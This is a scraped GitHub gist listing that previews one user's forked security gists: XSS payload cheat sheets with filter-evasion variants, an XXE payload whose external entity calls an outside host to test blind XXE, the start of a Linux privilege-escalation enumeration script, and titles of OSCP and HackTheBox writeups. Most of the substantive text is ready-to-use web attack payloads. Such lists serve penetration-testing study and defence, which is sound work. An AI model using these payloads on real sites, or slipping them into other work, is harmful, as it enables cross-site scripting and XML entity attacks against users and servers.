Credit: @brutelogic (blog)
The XSS payloads and schemes used in all posts for a quick reference.
extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3
<brute contenteditable onblur=alert(1)>lose focus!
FB fb11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
| ><img id=XSS SRC=x onerror=alert(XSS);> | |
| ;!--"<XSS>=&{()}" | |
| <IMG id=XSS SRC="javascript:alert('XSS');"> | |
| <IMG id=XSS SRC=javascript:alert('XSS')> | |
| <IMG id=XSS SRC=JaVaScRiPt:alert('XSS')> | |
| <IMG id=XSS SRC=javascript:alert("XSS")> | |
| <IMG id=XSS SRC=`javascript:alert("'XSS'")`> | |
| <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
| <IMG id=XSS SRC="jav ascript:alert('XSS');"> |
fb11
/ gist:951549ebcd3cc545d580efb2bae3094c
Last active
August 25, 2017 11:05
“>><<img src=x onerror=alert(1);//>>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| “>><<img src=x onerror=alert(1);//>> |
fb11
/ XSS, Cross Site Scripting, Javascript, Meta, HTML Injection Signatures
Created
October 11, 2017 16:47
— forked from xsscx/XSS, Cross Site Scripting, Javascript, Meta, HTML Injection Signatures
XSS, Cross Site Scripting, Javascript, Meta, HTML Injection Signatures
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Remote File Include with HTML TAGS via XSS.Cx */ | |
| /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */ | |
| /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */ | |
| /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */ | |
| /* Updated September 29, 2014 */ | |
| /* RFI START */ | |
| <img language=vbs src=<b onerror=alert#1/1#> | |
| <isindex action="javas	cript:alert(1)" type=image> | |
| "]<img src=1 onerror=alert(1)> | |
| <input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span> |
fb11
/ brutelogic.md
Created
October 16, 2017 17:36
— forked from toufik-airane/brutelogic.md
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Uzaktan Kod caistirma Basarili |
fb11
/ XXE_payloads
Created
November 6, 2017 11:49
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
fb11
/ enum.sh
Created
February 26, 2018 16:06
— forked from unfo/enum.sh
Linux priv esc. Might be out-dated script versions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| BLACK="\033[30m" | |
| RED="\033[31m" | |
| GREEN="\033[32m" | |
| YELLOW="\033[33m" | |
| BLUE="\033[34m" | |
| PINK="\033[35m" | |
| CYAN="\033[36m" | |
| WHITE="\033[37m" |
fb11
/ how-to-oscp-final.md
Created
February 26, 2018 16:18
— forked from unfo/how-to-oscp-final.md
fb11
/ CTFWRITE-Blocky-HTB.md
Created
March 3, 2018 22:52
— forked from berzerk0/CTFWRITE-Blocky-HTB.md
CTF Writeup: Blocky on HackTheBox
The official version is found at https://berzerk0.github.io/GitPage/CTF-Writeups/Blocky-HTB.html
fb11
/ CTFWRITE-Europa-HTB.md
Created
March 3, 2018 22:53
— forked from berzerk0/CTFWRITE-Europa-HTB.md
CTF Writeup: Europa on HackTheBox
The official version is found at https://berzerk0.github.io/GitPage/CTF-Writeups/Europa-HTB.html
OlderNewer